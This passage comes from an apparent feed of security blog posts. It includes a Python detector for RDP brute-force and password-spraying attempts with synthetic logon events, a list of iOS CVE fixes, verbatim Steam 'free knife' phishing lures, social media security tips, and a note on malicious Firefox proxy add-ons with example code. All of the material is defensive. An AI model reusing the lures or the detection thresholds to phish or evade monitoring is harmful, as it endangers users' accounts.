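    for i, u in enumerate(SPRAYED_USERS)
] + [
    # one of the guesses worked: the case that must not be lost in the noise
    {"time": BASE + timedelta(seconds=30), "event_id": 4624, "ip": ATTACKER, "user": "backup", "logon_type": 10},
    # a legitimate user mistyping twice, then getting in
    {"time": BASE + timedelta(seconds=5), "event_id": 4625, "ip": "192.0.2.10", "user": "jdoe", "logon_type": 10},
    {"time": BASE + timedelta(seconds=9), "event_id": 4625, "ip": "192.0.2.10", "user": "jdoe", "logon_type": 10},
    {"time": BASE + timedelta(seconds=14), "event_id": 4624, "ip": "192.0.2.10", "user": "jdoe", "logon_type": 10},
]


def detect_bruteforce(events, threshold=10, window=timedelta(seconds=60), remote_logon_types=(3, 10)):
    """One alert per source IP once `threshold` remote logon failures fall inside `window`.

    A later 4624 from an alerted IP is recorded as success_after: treat that as a
    likely compromise, not as the attacker giving up."""
    recent = defaultdict(deque)   # ip -> failure timestamps still inside the window
    total = defaultdict(int)      # ip -> all failures seen
    users = defaultdict(set)      # ip -> distinct usernames tried
    alerts = {}
    for event in sorted(events, key=lambda e: e["time"]):
        if event["logon_type"] not in remote_logon_types:
            continue
        ip = event["ip"]
        if event["event_id"] == 4625:
            q = recent[ip]
            q.append(event["time"])
            while q and event["time"] - q[0] > window:
                q.popleft()  # slide the window forward
            total[ip] += 1
            users[ip].add(event["user"])
            if len(q) >= threshold:
                alert = alerts.setdefault(ip, {"ip": ip, "first_failure": q[0], "success_after": None})
                alert["failures"] = total[ip]
                alert["distinct_users"] = len(users[ip])
        elif event["event_id"] == 4624 and ip in alerts and alerts[ip]["success_after"] is None:
            alerts[ip]["success_after"] = (event["user"], event["time"])
    return list(alerts.values())


def format_alert(alert):
    tail = ""
    if alert["success_after"]:
        user, when = alert["success_after"]
        tail = f"; SUCCESSFUL LOGON as {user} at {when:%H:%M:%S} (treat as compromised)"
    return (f"{alert['ip']}: {alert['failures']} failures, {alert['distinct_users']} usernames, "
            f"from {alert['first_failure']:%Y-%m-%d %H:%M:%S}{tail}")


if __name__ == "__main__":
    for alert in detect_bruteforce(SAMPLE_EVENTS):
        print(format_alert(alert))
```

Pair the detection with prevention: an account lockout policy and, wherever possible, taking RDP off the internet behind a VPN or gateway with MFA. Many distinct usernames from one source is password spraying, which lockout policies alone do not stop, so the distinct_users count is worth alerting on in its own right.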

IOCs 

Besides the characteristics mentioned in this post, the FBI points to a sample YARA rule for Ranzy Locker, which can be found here.

 Stay safe, everyone! 


Update now! Apple patches bugs in iOS and iPadOS

On two consecutive days Apple released a few important patches. iOS 14.8.1 comes just a month after iOS 14.8, for those who do not want to update their iPhones to iOS 15. The update also came as something of a surprise, as it was not beta-tested beforehand.

Earlier this year Apple announced that users would have a choice between updating to iOS 15 as soon as it’s released, or staying on iOS 14 but still receiving important security updates.

Now the differences are starting to show. As you can see in the table below, some patches are specific for 14.8.1 and some are specific for 15.1, while many are shared between them. In total 24 CVEs were covered.

iOS/iPadOS 15.1 (25-Oct-21)    iOS/iPadOS 14.8.1 (26-Oct-21)
CVE-2021-30907                 CVE-2021-30907
CVE-2021-30917                 CVE-2021-30917
CVE-2021-30903                 CVE-2021-30903
CVE-2021-30905                 -
CVE-2021-30919                 CVE-2021-30919
CVE-2021-30881                 -
CVE-2021-30900                 CVE-2021-30900
CVE-2021-30914                 -
CVE-2021-30906                 -
CVE-2021-30894                 -
CVE-2021-30886                 -
CVE-2021-30909                 CVE-2021-30909
CVE-2021-30916                 CVE-2021-30916
CVE-2021-30910                 -
CVE-2021-30911                 -
CVE-2021-30875                 -
CVE-2021-30915                 -
CVE-2021-30902                 CVE-2021-30902
CVE-2021-30887                 -
CVE-2021-30888                 CVE-2021-30888
CVE-2021-30889                 -
CVE-2021-30890                 -
-                              CVE-2021-30883
-                              CVE-2021-30918

The ones that stood out

Apple is, for understandable reasons, always a bit secretive about what was fixed, but from what we were able to figure out, these are the most worrying ones by type of vulnerability.

Elevation of privileges

The descriptions below follow the public vulnerability entries. The components involved are shared across Apple’s operating systems, which is why the same CVE numbers also appear in the watchOS, tvOS and macOS advisories.

CVE-2021-30906: A flaw in the iCloud component lets a local attacker elevate their privileges. Exploitation is local and needs only low-privileged access to the device.

CVE-2021-30907: A flaw in the Audio component lets a malicious application elevate privileges. Exploitation is local; the attacker needs to get an app running on the device, nothing more.

Arbitrary code execution

CVE-2021-30881: A flaw in the FileProvider component means unpacking a maliciously crafted archive may lead to arbitrary code execution. The attack can be delivered remotely and needs no authentication, but it requires the victim to open the archive.

CVE-2021-30883: A flaw in the IOMobileFrameBuffer component lets an application execute arbitrary code with kernel privileges. Apple says this issue may have been actively exploited. As previously discussed here.

CVE-2021-30886: A flaw in the kernel lets an application execute arbitrary code with kernel privileges. Exploitation is local and needs only low-privileged access.

CVE-2021-30889: A flaw in the WebKit component means processing maliciously crafted web content may lead to arbitrary code execution. The attack can be launched remotely and needs no authentication, but it requires the victim to visit the content.

CVE-2021-30894: A flaw in the Image Processing component lets an application execute arbitrary code with kernel privileges. Exploitation is local and needs only low-privileged access.

CVE-2021-30900: A flaw in the GPU Drivers component lets a malicious application execute arbitrary code with kernel privileges. Exploitation is local and needs only low-privileged access.

CVE-2021-30902: A flaw in the Voice Control component lets a local attacker cause unexpected application termination or arbitrary code execution. Exploitation is local and needs only low-privileged access.

CVE-2021-30903: A flaw in the Continuity Camera component lets a local attacker cause unexpected application termination or arbitrary code execution. Exploitation is local and needs only low-privileged access.

CVE-2021-30909: A flaw in the kernel, also listed for macOS up to 12.0, lets an application execute arbitrary code with kernel privileges. Exploitation is local and needs only low-privileged access.

CVE-2021-30914: A flaw in the GPU Drivers component lets an application execute arbitrary code with kernel privileges. Exploitation is local and needs only low-privileged access.

CVE-2021-30916: A flaw in the kernel lets a malicious application execute arbitrary code with kernel privileges. Exploitation is local and needs only low-privileged access.

CVE-2021-30917: A flaw in the ColorSync component means processing a maliciously crafted image may lead to arbitrary code execution. The attack can be launched remotely and needs no authentication, but it requires the victim to open the image.

CVE-2021-30919: A flaw in the CoreGraphics component means processing a maliciously crafted PDF may lead to arbitrary code execution. The attack can be launched remotely and needs no authentication, but it requires the victim to open the PDF.

Mitigation

Apple advises users to update to iOS 15.1 and iPadOS 15.1 or iOS 14.8.1 and iPadOS 14.8.1 which can be done through the automatic update function or iTunes.

Stay safe, everyone!


Watch out for the Steam skin “free knife” scam

Have you ever had someone run up to you in the street and insist you take their free knife? I hope not, because that’s a good way to wind up in a 60-minute police procedural drama. In video game land, however, anything goes. A certain type of scam is showing signs of activity at the moment and it’s likely to claim some victims before the week is out.

It involves, wait for it: someone digitally running up to you and insisting you take their free knife.

Free knife? What do you mean?

Many games on Steam make use of skins. These are fancy overlays of in-game items. You may not impress someone with your boring old default knife, or gun, or item of clothing. A rare graphical enhancement which makes said item look incredibly distinctive, however? Now you’re talking.

Skins are most commonly traded in-game. Sometimes they’re sold for virtual or real cash, although depending on the game, using real money may be against the terms of service. A few games have their trading systems deeply embedded into game platforms. For example, Steam has its own marketplace for transactions.

Are skins used in scams?

Oh boy, are they ever. One of the oldest scams around is skin phishing. The phisher will create a fake marketplace, or an imitation of a real game-themed lounge, or even just a fake user’s trading inventory page. Account compromise, and/or malware usually follows.

What does this particular scam involve?

It’s a tactic designed to scam people in the fastest way imaginable. What the scammer does can charitably be described as “minimal”. In short, they’ll send a message to potential victims on Steam or on services such as Discord. There are variations in messaging, but the essence remains the same.

“Yo, I don’t know you unfortunately, but this is for you, I do not need that knife [link]”

“I haven’t met you unfortunately (or not lol), but take it, I don’t need that skin [link]”

“G’day – I don’t need this bayonet just take it [link]”

Note the similarities in the first and second messages. It’s hard to say if the messages are manually typed out or automated, but we seem to be peeking at the typical indicators of a deliberate decision to try this tactic out.

Once the account is phished, the victim will have to go through Steam support to try and recover it. Accounts can have an awful lot of money tied to them. There may be thousands of dollars worth of titles bound to it. It may have hundreds of dollars in the user’s Steam wallet. There could be a ton of rare items, gifts, and other content sitting in the user’s Inventory page. Pretty much anything in there is at risk once the scammer gets their claws into the account, and account recovery can be rather stressful at the best of times.

How can I keep my Steam account secure?

Steam has a comprehensive list of security tips for its users. They include everything from phishing tips and general safety advice to account verification and two-factor authentication.

As for the free knives, bayonets, and anything else? Leave the mysterious strangers and their too-good-to-be-true murder objects to the crime dramas and keep that police cordon up around your Steam account.

The post Watch out for the Steam skin “free knife” scam appeared first on Malwarebytes Labs.

How social media mistakes can impact cybersecurity

We talked to members of our Malware Removal Support team and asked them what kind of problems they get asked to solve for our customers.

To understand why these questions end up with them, it helps to know that these are problems the Malwarebytes software itself cannot resolve. Many of them can be categorized under the header of trusting the wrong people.

Privacy concerns

You know how it freaks people out when Facebook shows them advertisements for things they have only just thought about buying? Many wonder how Facebook knows this.

They say, “I haven’t searched for the item yet, but here they are showing me this advertisement.”

It gets even worse when people have had a private conversation about it, and they think the advertisers or the platform has been eavesdropping on them.

Most of the time that is not true. So, how do the platforms know what ads to serve you?

  • Algorithms are smarter than most people think. Have you heard the story about the family that got coupons for baby clothes and cribs even before their daughter told them she was expecting? We humans are way more predictable than we’d like to think.
  • Users of social media and Facebook in particular tend to forget how many people can see the “public” part of their profile and posts.
  • Websites share information about your scrolling behavior through cookies, FLoC, and other trackers.

Some people get so convinced they have spyware on their system that they contact our support team to help them get rid of it. All we can do is inform the public and point those looking for help in the right direction.

More Facebook concerns

Besides people not securing their Facebook settings and making everything public, they also make more blatant mistakes like posting their email addresses, clicking on links to surveys in Facebook, clicking on unsolicited links in Messenger, and answering posts that phish for information that makes it easier to guess your passwords.

[Image: phishing question]
Every Facebook user will have seen posts like this. Don’t give information like that away.

This comment by one MRS agent during our discussion says a lot:

“I had 2 friends on Facebook today get their profiles taken over because they clicked links they shouldn’t have clicked.”

When things do go wrong in cases like these, all our Support team can do is tell people to contact Facebook, as unfortunately we can’t help them.

Other password shenanigans

Another privacy-related concern we often get asked about is the sextortion emails that try to intimidate the recipient by telling them the attacker has their password. That password usually originates from some security breach, and the sender has simply found it in a data dump somewhere. A quick way to check whether your password has appeared in a known breach is a visit to the Have I Been Pwned? website.

If you do get an email like this, you should change the password anywhere you use it. And please use Multi-Factor Authentication wherever possible.

Social media and scams

Social media is a perfect way for scammers to reach a lot of people, and we often see them using this to round up victims. There are many kinds of Bitcoin scams to be found on YouTube, Twitter, and other platforms. And along with Tech Support scams, Ponzi schemes, misinformation, and many phishing attempts, you can find every kind of scammer on social media without having to look very hard.

A few more tips

To round this off, we assembled a few other mistakes our team sees a lot. Steering clear of these can save you a lot of trouble.

  • Letting browsers save their passwords. Use a password manager or password book for them, especially if you are sharing your system with others.
  • Never backing up their system. We understand it can be cumbersome, but imagine the misery when you lose access, be it because of ransomware or a hard drive failure.
  • Using cracks and keygens. The oldest trick in the book to spread malware is to tell visitors that it is a crack or keygen for a popular game or other software.
  • Using torrent software. The same as for cracks and keygens applies here—unless you can verify what you are receiving, don’t download anything from anyone.

Stay safe, everyone!

The post How social media mistakes can impact cybersecurity appeared first on Malwarebytes Labs.

Patch now to bypass Firefox add-ons that abuse the proxy API to deny updates

In a Firefox security announcement, Mozilla said 455,000 users have downloaded Firefox add-ons that interfere with how they connect to the internet.

The interference in itself was not the deciding factor, however. The add-ons abused the proxy API to prevent users who had installed them from downloading updates, accessing updated blocklists, and updating remotely configured content.

What is the proxy API?

Add-on developers can use the proxy API to register an event listener that intercepts web requests and returns an object describing whether and how to proxy each of them. Add-ons that use the proxy API need the “proxy” permission. And where they want to intercept requests, they also need “host” permission for the URLs of the intercepted requests.

Google Chrome provides an extension API also called “proxy” which is functionally similar to this API, in that extensions can use it to implement a proxying policy. However, the design of the Chrome API is completely different to this API. They are incompatible, which means using both is NOT recommended as it may result in connectivity issues.

Abuse cases

Mozilla says the add-ons were advertised to users as being able to bypass paywall restrictions on websites. It is unknown whether the blocking of updates was intentional and whether the add-ons were performing other malicious actions.

Mozilla has blocked the malicious add-ons so they cannot be installed by anyone else. Starting with Firefox 91.1, Firefox falls back to a direct connection when an important request (such as one for updates) made via a proxy configuration fails. That way, users cannot be denied important updates.

Mitigation

Mozilla stopped accepting add-on submissions that use the proxy API until fixes were available for all users.

One of those fixes is a system add-on named “Proxy Failover” (ID: proxy-failover@mozilla.com) with additional mitigations, which Mozilla has shipped to both current and older Firefox versions. This system add-on implements failover rules for system requests over malfunctioning proxies. In other words, if a proxied system request fails, the proxy configuration in use will be disabled.

As usual, make sure your browser is up to date. The latest version of the Firefox Standard Release for Desktop is at 93.0.

[Image: latest Firefox version]

In case you are not running the latest version, and have not disabled updates, you might want to check whether you are affected by this issue. First, try updating Firefox manually (from the menu, click Settings, then on the General tab scroll down to Firefox Updates and click the Check for updates button). Recent versions of Firefox come with an updated blocklist that automatically disables the malicious add-ons, so you should be able to get an update.

If that does not work, you are advised to check in the Add-ons section for one of the following entries:

  • Name: Bypass ID: {7c3a8b88-4dc9-4487-b7f9-736b5f38b957}
  • Name: Bypass XM ID: {d61552ef-e2a6-4fb5-bf67-8990f0014957}

Please make sure the ID matches exactly as there might be other, unrelated add-ons using those or similar names. If none of those IDs are shown in the list, you are not affected.

If you do find one of these entries, you can remove the add-on under the Add-ons and themes section of the menu by clicking on the three horizontal dots and selecting Remove from the dropdown menu.

[Image: how to remove an add-on]

Using the proxy API going forward

Developers who wish to use the proxy API for legitimate reasons are asked to include a strict_min_version key in their manifest.json files targeting “91.1” or above. This ensures that your users will not suffer blocked updates, and it will expedite the review of your add-on.
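To make the two points above concrete (the proxy API as a request listener that needs the “proxy” permission plus host permissions, and the strict_min_version key Mozilla asks for), here is an added example of what a legitimate proxy-API add-on looks like. This is illustration code written for this article, not Mozilla’s code and not the “Bypass” add-ons discussed here. The intranet host name, the SOCKS proxy address and the add-on ID are placeholders chosen for the example; the manifest is expressed as a JavaScript object so the file runs stand-alone outside Firefox.

```javascript
// Added example, not Mozilla's code and not the "Bypass" add-ons from the
// article: the skeleton of a legitimate Firefox add-on using the proxy API.
// Assumptions (not from the article): the intranet host, the SOCKS proxy
// address and the add-on ID below are placeholders chosen for illustration.

// manifest.json, expressed as a JS object so this file runs stand-alone.
// "proxy" is the permission the API requires; the host permission covers the
// only URLs the listener will intercept; strict_min_version "91.1" is what
// Mozilla asks proxy-API add-ons to target so their users keep the
// update-failover behaviour introduced in Firefox 91.1.
const MANIFEST = {
  manifest_version: 2,
  name: "Intranet proxy helper (example)",
  version: "1.0",
  permissions: ["proxy", "*://*.example-intranet.test/*"],
  browser_specific_settings: {
    gecko: {
      id: "intranet-proxy-example@example.invalid", // placeholder ID
      strict_min_version: "91.1",
    },
  },
  background: { scripts: ["background.js"] },
};

// Only these hosts (and their subdomains) are sent through the proxy.
const PROXIED_HOSTS = ["example-intranet.test"];
const PROXY = { type: "socks", host: "127.0.0.1", port: 1080, proxyDNS: true };
const DIRECT = { type: "direct" };

function hostMatches(hostname) {
  return PROXIED_HOSTS.some(h => hostname === h || hostname.endsWith("." + h));
}

// Pure decision function. Returns a ProxyInfo, or an array of ProxyInfo
// objects that Firefox tries in order: the proxy first, then a direct
// connection if the proxy cannot be reached. Anything that is not one of
// our hosts (the browser's own update or blocklist traffic included) is
// returned as "direct" and never touches the proxy.
function decideProxy(requestInfo) {
  let hostname;
  try {
    hostname = new URL(requestInfo.url).hostname;
  } catch (e) {
    return DIRECT; // unparsable URL: do not get in the way
  }
  return hostMatches(hostname) ? [PROXY, DIRECT] : DIRECT;
}

// Register only inside Firefox. The filter is as narrow as the host
// permission, so requests to other sites never reach the listener at all.
if (typeof browser !== "undefined" && browser.proxy) {
  browser.proxy.onRequest.addListener(decideProxy, {
    urls: ["*://*.example-intranet.test/*"],
  });
  browser.proxy.onError.addListener(err =>
    console.error("proxy API error:", err.message)
  );
}
```

Two design choices matter for the problem in this article. The listener filter is no wider than the host permission, so the add-on is never even consulted about requests to other sites, update requests included. And when it does proxy, it returns a failover chain ending in a direct connection, so a dead proxy degrades to a normal connection instead of a silent failure. That add-on-level failover is separate from the system-wide Proxy Failover mitigation Mozilla shipped; it is simply what a well-behaved add-on should have done on its own.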

Stay safe, everyone!

The post Patch now to bypass Firefox add-ons that abuse the proxy API to deny updates appeared first on Malwarebytes Labs.